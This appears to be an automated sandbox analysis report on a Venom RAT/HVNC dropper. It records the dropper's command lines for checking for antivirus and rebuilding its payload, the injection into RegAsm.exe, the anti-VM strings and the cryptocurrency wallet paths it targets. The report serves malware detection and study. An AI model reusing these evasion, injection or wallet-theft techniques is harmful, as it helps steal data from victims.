                    Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
                    Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                    Source: OR8Ti8rf8h.exeStatic PE information: real checksum: 0x345ed5 should be: 0x33f00c

                    Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\585711\Depression.com
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\585711\Depression.com
Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | File created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe

Boot Survival

Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Memory allocated: 3100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Memory allocated: 3420000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Memory allocated: 3100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Window / User API: threadDelayed 1003
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Window / User API: threadDelayed 8839
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe TID: 7688 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe TID: 8016 | Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose, | 0_2_00406301
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, | 0_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\585711
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\585711\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user~1\AppData\
Source: RegAsm.exe, 0000000E.00000002.2629872593.0000000001829000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWX
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: RegAsm.exe, 0000000E.00000002.2633955559.00000000059E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VirtualMachine:
Source: C:\Users\user\AppData\Local\Temp\585711\Depression.com | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, | 0_2_00406328
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: 1170000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: 1170000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comMemory written: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe base: F7F000Jump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 585711Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\585711\Depression.com Depression.com YJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\Depression.comProcess created: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\solaris + ..\harassment + ..\proudly + ..\turned + ..\viruses + ..\wallpapers + ..\usc + ..\crm + ..\ribbon + ..\confident + ..\angle + ..\alumni + ..\fees + ..\reserve + ..\reflected + ..\include + ..\specialist + ..\respondent + ..\false + ..\assume + ..\regardless + ..\mary + ..\consecutive + ..\movers + ..\scottish + ..\holocaust + ..\experience + ..\phrase + ..\started + ..\disturbed + ..\needle + ..\pipes + ..\hollow + ..\spelling + ..\reed + ..\tft + ..\specialties y
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\solaris + ..\harassment + ..\proudly + ..\turned + ..\viruses + ..\wallpapers + ..\usc + ..\crm + ..\ribbon + ..\confident + ..\angle + ..\alumni + ..\fees + ..\reserve + ..\reflected + ..\include + ..\specialist + ..\respondent + ..\false + ..\assume + ..\regardless + ..\mary + ..\consecutive + ..\movers + ..\scottish + ..\holocaust + ..\experience + ..\phrase + ..\started + ..\disturbed + ..\needle + ..\pipes + ..\hollow + ..\spelling + ..\reed + ..\tft + ..\specialties yJump to behavior
Source: Depression.com, 0000000B.00000000.1425761430.00000000010C3000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: ProgMan
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView
Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager`,
Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000036D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager@\
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MSASCui.exe
Source: RegAsm.exe, 0000000E.00000002.2633955559.00000000059A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Electrum#\Electrum\wallets
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: exodus
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Yara match | File source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
